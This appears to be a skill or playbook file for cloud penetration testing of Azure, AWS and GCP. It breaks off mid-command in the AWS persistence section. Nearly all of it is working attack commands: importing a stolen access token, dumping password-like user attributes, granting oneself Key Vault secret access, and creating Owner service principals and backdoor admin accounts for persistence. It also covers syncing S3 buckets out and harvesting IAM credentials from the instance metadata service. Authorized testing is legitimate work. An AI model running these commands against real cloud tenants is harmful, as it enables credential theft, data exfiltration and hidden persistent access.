Cloud Penetration Testing
Purpose
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
Prerequisites
Required Tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install
curl https://sdk.cloud.google.com | bash
gcloud init
pip install scoutsuite pacu
Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts
Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement
Outputs and Deliverables
- Cloud Security Assessment Report - Comprehensive findings and risk ratings
- Resource Inventory - Enumerated services, storage, and compute instances
- Credential Findings - Exposed secrets, keys, and misconfigurations
- Remediation Recommendations - Hardening guidance per platform
Core Workflow
Phase 1: Reconnaissance
Gather initial information about target cloud presence:
curl "https://login.microsoftonline.com/[email protected]&xml=1"
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
python3 cloud_enum.py -k targetcompany
cat ips.txt | python3 ip2provider.py
Phase 2: Azure Authentication
Authenticate to Azure environments:
Import-Module Az
Connect-AzAccount
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
Save-AzContext -Path C:\Temp\AzureAccessToken.json
Import-Module MSOnline
Connect-MsolService
Phase 3: Azure Enumeration
Discover Azure resources and permissions:
Get-AzContext -ListAvailable
Get-AzSubscription
Get-AzRoleAssignment
Get-AzResource
Get-AzResourceGroup
Get-AzStorageAccount
Get-AzWebApp
Get-AzSQLServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile
Get-MSolUser -All
Get-MSolGroup -All
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID
Get-MsolServicePrincipal
Phase 4: Azure Exploitation
Exploit Azure misconfigurations:
$users = Get-MsolUser -All
foreach($user in $users){
$props = @()
$user | Get-Member | foreach-object{$props+=$_.Name}
foreach($prop in $props){
if($user.$prop -like "*password*"){
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
}
}
}
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
$vms = Get-AzVM
$vms.UserData
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
Phase 5: Azure Persistence
Establish persistence in Azure:
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
Phase 6: AWS Authentication
Authenticate to AWS environments:
aws configure
aws configure --profile target
aws sts get-caller-identity
Phase 7: AWS Enumeration
Discover AWS resources:
aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir
aws ec2 describe-instances
aws rds describe-db-instances --region us-east-1
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>
aws eks list-clusters --region us-east-1
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
Phase 8: AWS Exploitation
Exploit AWS misconfigurations:
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
Phase 9: AWS Persistence
Establish persistence in AWS:
aws iam list-access-keys --user-name <username
